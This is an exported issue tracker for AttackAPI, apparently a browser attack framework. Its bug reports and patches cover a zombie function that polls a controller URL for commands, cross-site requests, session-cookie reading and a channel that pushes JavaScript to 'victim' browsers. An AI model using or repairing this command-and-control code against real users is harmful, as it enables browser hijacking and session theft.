attackapi's Issues

Enhancement, make a hijackVar? code provided.

make a function hijackVar for logging every time a variable's content is
accessed.

code:
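    AttackAPI.dom.hijackVar = function (varo, callback) {
        // Already wrapped: hand it back unchanged.
        if (varo.hijacked) return varo;
        var varn = Object();
        varn.hijacked = true; // mark the wrapper so it is not wrapped twice
        varn.original = varo;
        // Any coercion of the wrapper to a primitive or string fires the callback.
        varn.valueOf = varn.toSource = varn.toString = function () {
            if (callback) callback();
            return this.original;
        };
        return varn; // the posted code never returned the wrapper
    };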


Original issue reported on code.google.com by sirdarckcat on 12 Aug 2007 at 6:49

document integration

The building system should export the project wiki into the doc/ through
Google's subversion and integrate it within the document generation
application. Wiki parser is required!

Original issue reported on code.google.com by pdp.gnucitizen on 1 Dec 2007 at 1:04

iframe dynamic onload (cross-platform)

What steps will reproduce the problem?
1. any AttackAPI function call that creates an iframe assigning an onload 
function. 
let's take requestXSS, for instance.

What is the expected output? What do you see instead?
IE won't call the dynamically assigned onload function.

What version of the product are you using? On what operating system?


Please provide any additional information below.
We may have to use something like below:

...
if(AttackAPI.dom.getAgent() == 'msie'){
  ifr.onreadystatechange = function(){
    if(ifr.readyState=="complete"){
       // ...
    }
  };
}
...

Original issue reported on code.google.com by [email protected] on 17 Aug 2007 at 1:42

No data in AttackAPI.dom.requestXSS

What steps will reproduce the problem?
1. Load AttackAPI
2. In Firebug, type
var b = new Object();
b.url = 'http://www.google.com/'
b.onload = function(d, r) { alert('foo'); alert(d['data']); alert(r.url); };
AttackAPI.dom.requestXSS(b);

What is the expected output? What do you see instead?
I expect to see a popup with foo, a popup with some data and a popup with
http://www.google.com/
Instead, I see a popup with foo, a popup with null and a popup with
http://www.google.com/

What version of the product are you using? On what operating system?
Tested with version 2.2.0a in Firefox on FreeBSD

Please provide any additional information below.
Maybe I didn't understand the purpose of the requestXSS function, there is
no documentation for it.

Original issue reported on code.google.com by [email protected] on 5 Sep 2007 at 7:15

Enter one-line summary

What steps will reproduce the problem?
1. function dom.spawnSandbox(data) doesn't return the sandbox with my data
as parameter.

What is the expected output? What do you see instead?

AttackAPI.dom.spawnSandbox( { myfn: function() { alert('hi'); } }
).scope.myfn();

spawnSandbox should return sandbox object with myfn extended in scope
object, but it doesn't.

What version of the product are you using? On what operating system?
2.2.0a - XP SP2

Please provide any additional information below.

this is the original piece of code:

AttackAPI.dom.spawnSandbox = function (data) {
...
...
    ifr.onload = function () {
        loaded = true;
        AttackAPI.core.extend(ifr.contentWindow, data);
        for (var i = 0; i < queue.length; i++)
            sandbox.evaluate(queue[i]);
    };
    return sandbox;
}
END


I resolved it by extending the ifr.contentWindow before the ifr.onload function:


AttackAPI.dom.spawnSandbox = function (data) {   
...
...
    AttackAPI.core.extend(ifr.contentWindow, data);

    ifr.onload = function () {
        loaded = true;
        for (var i = 0; i < queue.length; i++)
            sandbox.evaluate(queue[i]);
    };

    return sandbox;
}
END

Original issue reported on code.google.com by [email protected] on 26 Jun 2007 at 2:54

MasterAPI several problems

There are a couple of things that need to be fixed in the next version of
MasterAPI.

1. The console has to work with Opera, IE6, IE7 and Firefox
2. The shell has to work with Opera, IE6, IE7 and Firefox
    - fix the "eval" and "with" statements
    - the shell needs to create an instance of a shell object and return that
      to the developer for further use

Original issue reported on code.google.com by pdp.gnucitizen on 20 Oct 2006 at 4:19

data url builders

add support for various types of data urls

DataURLEncoder --> for the data: schema
JavaScriptDataURLEncoder --> for the javascript: schema

Original issue reported on code.google.com by pdp.gnucitizen on 20 Oct 2006 at 3:00

bug, AttackAPI.dom.zombiefyL

Code:
    AttackAPI.dom.zombiefyL = function (url, interval) {
        var interval = (interval == 'undefined')?interval:2000;

        window.setInterval(function () {
            AttackAPI.dom.requestJSL(url + '?action=pull');
        }, interval);
    };

What is the expected output? What do you see instead?
Shouldn't it be:
var interval = (interval != 'undefined')?interval:2000;


Please provide any additional information below.


Original issue reported on code.google.com by sirdarckcat on 12 Aug 2007 at 6:45
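
The default-value check discussed in this report, worked through as an added example (not code from AttackAPI or from the reporter; all function names are hypothetical). It compares the expression as quoted, the expression as proposed, and a `typeof` check with validation.

```javascript
// Added example; names are hypothetical, not AttackAPI code.

// As quoted in the report: compares the value to the *string* 'undefined',
// so every numeric argument is discarded in favour of 2000.
function intervalAsWritten(interval) {
  return (interval == 'undefined') ? interval : 2000;
}

// As proposed in the report: numbers now pass through, but so does a missing
// argument, because undefined != 'undefined' is true. A timer given an
// undefined delay treats it as 0, i.e. it fires as fast as it can.
function intervalAsProposed(interval) {
  return (interval != 'undefined') ? interval : 2000;
}

// typeof-based default plus validation, so only a positive finite number
// can ever reach a timer call.
function intervalChecked(interval) {
  if (typeof interval === 'undefined') return 2000;
  const n = Number(interval);
  if (!Number.isFinite(n) || n <= 0) return 2000;
  return n;
}

// Builds one row per input so the three behaviours can be read side by side.
function compareDefaults(inputs) {
  return inputs.map(function (v) {
    return {
      input: v,
      written: intervalAsWritten(v),
      proposed: intervalAsProposed(v),
      checked: intervalChecked(v)
    };
  });
}

// Constructed sample inputs: omitted argument, valid number, numeric string,
// junk string, negative number.
const ROWS = compareDefaults([undefined, 500, '750', 'abc', -5]);
console.table(ROWS);
```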

channel.php enhancement

* support for groups
* support for RSS output
* support for targets
* support for dynamic client names
* support for multi-client requests

Original issue reported on code.google.com by pdp.gnucitizen on 20 Oct 2006 at 3:03

getCookie function returns null

This is a trivial one;

What steps will reproduce the problem?
1. With document.cookie equal to PHPSESSID=9b243572455a4d62683de5dd8544da1e,
run a JavaScript line like the one below:
myCookieVal = AttackAPI.dom.getCookie("PHPSESSID");

What is the expected output? What do you see instead?
expected output: 
myCookieVal = 9b243572455a4d62683de5dd8544da1e
instead;
myCookieVal = null

What version of the product are you using? On what operating system?
2.2.0a, XPPro_SP2, IE6

Please provide any additional information below.
lines in getCookie function 

  if (cookie == unescape(pair.substring(0, name.length)))
    return unescape(pair.substring(name.length + 1));

might be changed to 

  if (cookie == unescape(pair.substring(0, cookie.length)))
    return unescape(pair.substring(cookie.length + 1));


Original issue reported on code.google.com by [email protected] on 7 May 2007 at 4:13
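
Name matching in a cookie lookup, as an added example (not AttackAPI's code or the reporter's). It assumes the cookie string is split on `;`; the function names and the multi-cookie sample string are constructed. It shows that the prefix comparison from the suggested lines works for the single-cookie case in the report but returns the wrong value when another cookie name starts with the requested one, and gives an exact-name lookup beside it.

```javascript
// Added example; function names and the split on ';' are assumptions.

// Prefix comparison, following the two suggested lines in the report.
function getCookiePrefix(cookieString, cookie) {
  for (const raw of cookieString.split(';')) {
    const pair = raw.trim();
    if (cookie == unescape(pair.substring(0, cookie.length)))
      return unescape(pair.substring(cookie.length + 1));
  }
  return null;
}

// Decode percent-encoding, but never throw on a malformed sequence.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Exact-name lookup: split each pair at its first '=' and compare whole names.
function getCookieExact(cookieString, cookie) {
  for (const raw of cookieString.split(';')) {
    const pair = raw.trim();
    const eq = pair.indexOf('=');
    if (eq === -1) continue; // fragment without a value, skip it
    if (safeDecode(pair.substring(0, eq)) === cookie)
      return safeDecode(pair.substring(eq + 1));
  }
  return null;
}

// The single-cookie case from the report.
const SINGLE = 'PHPSESSID=9b243572455a4d62683de5dd8544da1e';

// Constructed sample: a second cookie whose name shares the prefix comes first,
// and one value contains an encoded '='.
const SAMPLE = 'PHPSESSID2=other; ' + SINGLE + '; theme=a%3Db';

console.log(getCookiePrefix(SINGLE, 'PHPSESSID')); // value from the report
console.log(getCookiePrefix(SAMPLE, 'PHPSESSID')); // wrong cookie is matched
console.log(getCookieExact(SAMPLE, 'PHPSESSID'));  // value from the report
```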

master can't push a message to a client

What steps will reproduce the problem?
1. in one browser, let's say IE, create a zombie, extend with an onpull
function and start it. (victim)
2. in another browser, say FF, create another zombie, list victim zombies,
and send a message via push("alert(1)", "GLOBAL") 

What is the expected output? What do you see instead?
I should see the "alert(1)" message at the victim's onpull function.

What version of the product are you using? On what operating system?
2.2.0a, XPSP2

Please provide any additional information below.

Should I have sent an email instead? I don't know. Anyway, here it goes:

In AttackAPI 2.2.0a, in "AttackAPI.dom.spawnChannel" method, there are
"transport" and "evaluate" functions. These functions send "referrer" query
parameters. 

With these in hand, a master (yet another zombie, in fact) can't push
messages to clients, since clients fetch their corresponding messages
indexed via their referrers:

array_shift($_SESSION['_message_queue'][$REFERRER])

Actually I didn't try hard to understand but what do you use referrers for?

My patch was to do this;

function transport(query) {
  AttackAPI.core.extend(query, {
    /*referrer: channel.referrer,*/
    __r: Math.random() + '_' + new Date().getTime()
  });
  AttackAPI.dom.transport({url: channel.location, query: query});
}

same with the evaluate function...

Original issue reported on code.google.com by [email protected] on 2 May 2007 at 12:35
